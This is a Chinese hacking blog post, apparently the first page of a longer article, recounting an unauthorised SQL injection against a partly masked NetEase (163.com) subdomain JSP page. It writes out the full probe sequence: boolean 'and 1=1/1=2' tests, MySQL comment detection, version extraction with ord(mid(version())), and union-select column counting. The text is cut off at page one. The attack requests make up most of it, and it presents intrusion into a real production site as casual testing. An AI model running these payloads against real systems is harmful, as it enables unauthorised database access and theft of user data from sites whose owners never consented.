对网易的一次入侵检测(Jsp+mysql的入侵)

163.com是国内一家比较出名的门户网站，提供包括邮箱等等在内的各种服务，这样繁多的服务，不知道会不会在哪些地方存在漏洞哦！正好最近学习了一些注入知识就想对这些门户网站做点小小的安全检测，不知道他们的脚本像不像他们名声一样那么厉害哦！
废话就不说了，我们就去找那些传递参数的页面看看会不会不小心有那么一个参数没有过滤，那么我们就有空子可以钻了哦！网易的脚本基本上是采取的jsp和Php的形式，主站看样子是静态的，就不说了，其他的站那么多的jsp和php应该有问题吧！Php注入也被人研究烂了，注入的时候被Php的那个特性拦着也相当的不舒服，所以干脆就去找jsp的脚本，希望能找到一些没有过滤的参数。找了能打两把CS的工夫还真让我找到一个页面http://XXX.163.com/wap/content.jsp?id=120，哈哈，看来是个数字类型的变量哦！就喜欢没有过滤的数字类型变量，因为如果能注入的话基本上没有什么阻碍！我们来看看能不能注入吧！提交：

http://XXX.163.com/wap/content.jsp?id=120 and 1=1
返回正常哦，如图1

接着提交：
http://XXX.163.com/wap/content.jsp?id=120 and 1=2
返回一堆的jsp错误，如图2，

还搞到了web的路径，幸福！通过路径我们还知道这个系统是Linux类系统哦。

根据上面的两个推测很有可能这就是一个注入点啦！因为我们提交的and 1=1和and 1=2被当作Sql代码执行啦！如果参数没有做其他过滤的话，我们就可以在这里提交我们的注入代码啦！那么继续看看吧！因为jsp可以和很多数据库搭配，所以这里我们还是先来看看是什么数据库吧！提交：

http://XXX.163.com/wap/content.jsp?id=120/*剑心
返回结果如图3

，看来是支持/*注释了，支持/*注释的在这里就应该是mysql数据库了！既然知道了是mysql数据库，那么就来看看系统的版本吧，如果在4.0以上对猜表和注入是很有帮助的哦！提交：

http://XXX.163.com/wap/content.jsp?id=120 and ord(mid(version(),1,1))>51/*
返回正常的结果，看来是大于4.0版本的啦，也就是支持union查询的啦！因为这里语句的作用是取出版本的第一个字符，是大于3的，其中51是3的ASCII字符！既然支持union查询我们就开看看字段的个数吧！提交：

http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1/*
返回错误如图4

继续提交：
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2/*
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3/*
……
到http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,6,7,8,9,10/*
的时候返回正常结果如图5

，看来是10个字段并且哪些字段会在页面显示也出来了！

[1] [2] [3] 下一页